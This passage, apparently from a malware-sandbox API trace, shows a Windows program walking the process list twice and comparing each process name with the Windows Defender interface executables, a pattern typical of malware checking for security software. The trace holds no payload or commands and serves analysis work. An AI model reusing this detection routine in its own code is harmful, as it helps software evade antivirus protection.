pcPriClassBase=8, dwFlags=0x0, szExeFile="somebody finder.exe")) returned 1 [0104.214] lstrcmpiW (lpString1="somebody finder.exe", lpString2="MSASCuiL.exe") returned 1 [0104.214] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pathology refrigerator horror.exe")) returned 1 [0104.215] lstrcmpiW (lpString1="pathology refrigerator horror.exe", lpString2="MSASCuiL.exe") returned 1 [0104.215] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="villagenodestrengths.exe")) returned 1 [0104.216] lstrcmpiW (lpString1="villagenodestrengths.exe", lpString2="MSASCuiL.exe") returned 1 [0104.216] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="luther.exe")) returned 1 [0104.217] lstrcmpiW (lpString1="luther.exe", lpString2="MSASCuiL.exe") returned -1 [0104.217] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0104.217] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCuiL.exe") returned 1 [0104.217] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.218] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0104.218] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0104.219] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCuiL.exe") returned 1 [0104.219] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.220] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCuiL.exe") returned 1 [0104.221] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.221] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0104.221] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x8e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fulezad.exe")) returned 1 [0104.222] lstrcmpiW (lpString1="fulezad.exe", lpString2="MSASCuiL.exe") returned -1 [0104.222] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0104.223] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0104.223] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0104.224] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0104.224] Process32NextW (in: hSnapshot=0xe8, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0104.224] CloseHandle (hObject=0xe8) returned 1 [0104.224] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xec [0104.228] Process32FirstW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.228] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCui.exe") returned -1 [0104.228] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.229] lstrcmpiW (lpString1="System", lpString2="MSASCui.exe") returned 1 [0104.229] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.230] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCui.exe") returned 1 [0104.230] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.230] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0104.230] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.255] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCui.exe") returned 1 [0104.255] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.255] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0104.255] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.256] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCui.exe") returned 1 [0104.256] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.256] lstrcmpiW (lpString1="services.exe", lpString2="MSASCui.exe") returned 1 [0104.256] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.257] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCui.exe") returned -1 [0104.257] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.257] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCui.exe") returned -1 [0104.257] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.258] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.258] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.259] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.259] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.259] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.259] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.260] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.260] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.260] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.260] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.261] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCui.exe") returned -1 [0104.261] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.261] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.261] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.262] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.262] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.263] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCui.exe") returned -1 [0104.263] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.263] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCui.exe") returned -1 [0104.263] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.264] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCui.exe") returned 1 [0104.264] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.265] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0104.265] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.266] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.266] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0104.267] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCui.exe") returned 1 [0104.267] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0104.267] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCui.exe") returned 1 [0104.267] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.268] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCui.exe") returned 1 [0104.268] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.269] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0104.269] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_philadelphia.exe")) returned 1 [0104.270] lstrcmpiW (lpString1="cdt_philadelphia.exe", lpString2="MSASCui.exe") returned -1 [0104.270] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pipesemesteraccepted.exe")) returned 1 [0104.271] lstrcmpiW (lpString1="pipesemesteraccepted.exe", lpString2="MSASCui.exe") returned 1 [0104.271] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="midwest-prostate.exe")) returned 1 [0104.271] lstrcmpiW (lpString1="midwest-prostate.exe", lpString2="MSASCui.exe") returned -1 [0104.271] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="edmonton cell.exe")) returned 1 [0104.272] lstrcmpiW (lpString1="edmonton cell.exe", lpString2="MSASCui.exe") returned -1 [0104.272] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="approx_comparisons.exe")) returned 1 [0104.273] lstrcmpiW (lpString1="approx_comparisons.exe", lpString2="MSASCui.exe") returned -1 [0104.273] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="compliant.exe")) returned 1 [0104.274] lstrcmpiW (lpString1="compliant.exe", lpString2="MSASCui.exe") returned -1 [0104.274] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="memovisitorslover.exe")) returned 1 [0104.275] lstrcmpiW (lpString1="memovisitorslover.exe", lpString2="MSASCui.exe") returned -1 [0104.275] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fixes.exe")) returned 1 [0104.275] lstrcmpiW (lpString1="fixes.exe", lpString2="MSASCui.exe") returned -1 [0104.275] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="lower-newfoundland-checks.exe")) returned 1 [0104.276] lstrcmpiW (lpString1="lower-newfoundland-checks.exe", lpString2="MSASCui.exe") returned -1 [0104.276] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="practice sees.exe")) returned 1 [0104.277] lstrcmpiW (lpString1="practice sees.exe", lpString2="MSASCui.exe") returned 1 [0104.277] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mind.exe")) returned 1 [0104.278] lstrcmpiW (lpString1="mind.exe", lpString2="MSASCui.exe") returned -1 [0104.278] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos.exe")) returned 1 [0104.279] lstrcmpiW (lpString1="autos.exe", lpString2="MSASCui.exe") returned -1 [0104.279] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed spirit.exe")) returned 1 [0104.279] lstrcmpiW (lpString1="succeed spirit.exe", lpString2="MSASCui.exe") returned 1 [0104.279] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="joseph saskatchewan.exe")) returned 1 [0104.280] lstrcmpiW (lpString1="joseph saskatchewan.exe", lpString2="MSASCui.exe") returned -1 [0104.280] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="enrolled-lebanon.exe")) returned 1 [0104.281] lstrcmpiW (lpString1="enrolled-lebanon.exe", lpString2="MSASCui.exe") returned -1 [0104.281] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pay_adapter.exe")) returned 1 [0104.282] lstrcmpiW (lpString1="pay_adapter.exe", lpString2="MSASCui.exe") returned 1 [0104.282] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mod.exe")) returned 1 [0104.283] lstrcmpiW (lpString1="mod.exe", lpString2="MSASCui.exe") returned -1 [0104.283] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="completing-h.exe")) returned 1 [0104.284] lstrcmpiW (lpString1="completing-h.exe", lpString2="MSASCui.exe") returned -1 [0104.284] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="water granny.exe")) returned 1 [0104.285] lstrcmpiW (lpString1="water granny.exe", lpString2="MSASCui.exe") returned 1 [0104.285] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="somebody finder.exe")) returned 1 [0104.285] lstrcmpiW (lpString1="somebody finder.exe", lpString2="MSASCui.exe") returned 1 [0104.285] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pathology refrigerator horror.exe")) returned 1 [0104.286] lstrcmpiW (lpString1="pathology refrigerator horror.exe", lpString2="MSASCui.exe") returned 1 [0104.286] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="villagenodestrengths.exe")) returned 1 [0104.287] lstrcmpiW (lpString1="villagenodestrengths.exe", lpString2="MSASCui.exe") returned 1 [0104.287] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="luther.exe")) returned 1 [0104.288] lstrcmpiW (lpString1="luther.exe", lpString2="MSASCui.exe") returned -1 [0104.288] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0104.289] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCui.exe") returned 1 [0104.289] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.290] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.290] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0104.290] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCui.exe") returned 1 [0104.290] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, 